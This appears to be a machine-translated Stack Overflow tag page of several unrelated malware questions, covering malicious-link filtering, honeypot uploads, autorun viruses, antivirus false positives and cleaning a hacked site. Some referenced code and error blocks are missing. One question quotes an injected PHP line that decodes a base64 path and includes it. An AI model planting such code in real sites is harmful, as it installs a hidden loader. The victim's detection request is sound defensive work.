问题标签 [malware]

我有两个服务 - Lincr 和 LinkBunch。Lincr 是一种简单的简 URL 缩短服务，而 LinkBunch 可让您将多个链接缩短为一个链接。我在服务中发布了太多垃圾邮件，所以我不得不关闭 Lincr。现在，即使是 LinkBunch 似乎也面临同样的问题，因此我的虚拟主机已将其禁用。

由于发布了错误的链接，我无法继续关闭这样的网站，因此我需要一个恶意软件过滤 API，我可以使用它在链接发布时过滤掉链接。

有一些服务可以让我下载一大堆坏链接来检查，但相反，我更喜欢在每个链接的基础上进行实时 API 调用。我可以用来做什么？

最后，最好的恶意软件过滤服务是什么？

大家好，有人知道捕蝇草蜜罐吗？

我正在尝试将本地收集的二进制信息和蜜罐上本地收集的攻击发送到中央服务器，但我无法得到它。

我尝试过使用 HTTP Post、Python CGI，但我无法获得它。蜜罐有一项服务，可让您通过HTTP发送数据（submit_http.py：http://src.carnivore.it/dionaea/commit/?id=cfd2be8cf7484c781384648cf1c9223afc2bd3c1 ）我在中央服务器上有一个最初开发的 PHP 文件对于猪笼草 (submit.php: http://www.remoteroot.net/2008/07/21/nepenthes-submit-http-server-with-file-upload/ ) 并希望接收文件以及每个文件的信息通过 HTTP POST 攻击相关参数。为什么 submit.php 不起作用？！

我有这样的 dionaea.conf：

这不是一个真正的编程问题......有没有办法确定哪个应用程序当前正在使用文件？我已经感染了其中一种 autorun.inf 病毒。当我尝试删除 autorun.inf 时，Windows 告诉我文件正在被另一个应用程序使用（显然是病毒）。

我可以找出哪个应用程序正在使用该文件吗？我可能更容易获取免费的防病毒软件，但我想先尝试自己删除恶意软件，然后再尝试其他任何东西（可能是有用的知识）。

对于课程作业，我必须分析恶意软件。

它是一个 .EXE Win32 机柜自解压器文件。（这就是windows看到它的方式，它实际上以 4D 5A 00 03 Hex 开头）。运行时，它提取创建的文件夹中的所有文件，运行恶意软件（批处理/VBS 文件），最后删除包含恶意软件文件的文件夹。

我想知道如何在不执行恶意软件的情况下提取？我使用了 ProcDump32，但它给了我：“进程不是 32 位或无法加载或已经完成！”。

不知何故，我成功卡住 ProcDump32 并获取文件夹几秒钟并在它“消失”之前将其复制，所以我得到了文件，但我不确定我收集了所有文件，我想以正确的方式进行.

所以我正在寻找一个可以提取 Win32 Cab Self-Extractor 文件内容而不执行输出文件的应用程序，如果可能的话，提供提取文件的列表。

我为客户端编写了一个下载管理器（使用 AutoHotKey 语言），它被少数病毒扫描程序（VirusTotal 上使用的扫描程序的 11%）标记为特洛伊木马、恶意软件、dropper、数据窃取程序等。软件不是我想纠正这些扫描仪错误标记的那些东西。以前有没有人处理过这种问题？

这里真正的复杂之处在于，由于这是一个下载管理器，我提供的实际签名二进制文件对于数千次下载都是不同的，所以我要求每个唯一版本都被列入白名单或其他东西是不切实际的。

当我真的没有什么可隐瞒的时候，我宁愿不尝试使用实际的伪装技术来欺骗反病毒公司，但我不确定是否有其他选择（我不确定我会是成功的）。有什么建议吗？

我很好奇可以使用哪些自动方法来确定在 Windows 或 PC 上运行的 Java 应用程序是否是恶意软件。（我什至不知道这样的应用程序可以利用哪些漏洞。有什么地方可以让我了解这些风险吗？）如果我有源代码，是否有特定的包或类可以比其他应用程序更有害地使用？也许他们可以建议恶意软件？

更新：感谢您的回复。我很想知道这是否可能，这听起来基本上是完全不可行的。很高兴知道。

我计划遵循此处提出的建议之一来控制窗口尺寸、隐藏/显示并将其带到与我的进程不同的进程所拥有的窗口的前面。

在 MS Windows(XP) 上使用来自不同进程的窗口句柄进行窗口操作

如何从 WinForms 应用程序控制新进程窗口的大小和位置？

您知道的任何恶意软件检测软件是否会将我的进程报告为恶意软件？

我的进程是否需要比我的进程和其他进程运行的最高权限更高的权限来控制其他进程窗口？

我正在尝试在共享主机上安装出色的http://www.rfxn.com/projects/linux-malware-detect/ 。

我已将inspath更改为我的本地目录，但它在创建符号链接时出错，只读/usr/lib/，最后找不到/usr/local/maldetect/conf.maldet。

谢谢你的帮助。我认为解决这个问题对很多人来说非常有用。

这是错误：

这是安装 bash：

好的，我对 php 很陌生，但我知道它可以读取目录和文件。

我一直在我们的一个站点上与恶意软件问题作斗争，我需要编写一个脚本来在我的主机空间上搜索它。

黑客在文件中放入的代码是

*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>

我不知道这是什么，但是当它出现时，谷歌会阻止我的网站。

我必须下载所有文件然后在dreamweaver中搜索它用空格替换这个废话并将它放回去。

我需要一个脚本来在谷歌之前检测到这一点。

如果有人可以给我一些指示，那就太好了

我相信这是每个​​人现在或以后都会面临的问题。

警告：这里有些不对劲！www.mywebsite.com 包含恶意软件。如果您访问此站点，您的计算机可能会感染病毒。如果您继续，Google 发现恶意软件可能会安装到您的计算机上。如果您过去曾访问过此站点或您信任此站点，则它可能最近刚刚被黑客入侵。你不应该继续，也许明天再试一次或去别的地方。我们已经通知 www.mywebsite.com 我们在该网站上发现了恶意软件。有关在 www.mywebsite.com 上发现的问题的更多信息，请访问 Google 安全浏览诊断页面。

如果您了解访问本网站可能会损害您的计算机，请继续。

我们的一个网站现已关闭，看起来像这样。这是什么原因？请帮忙。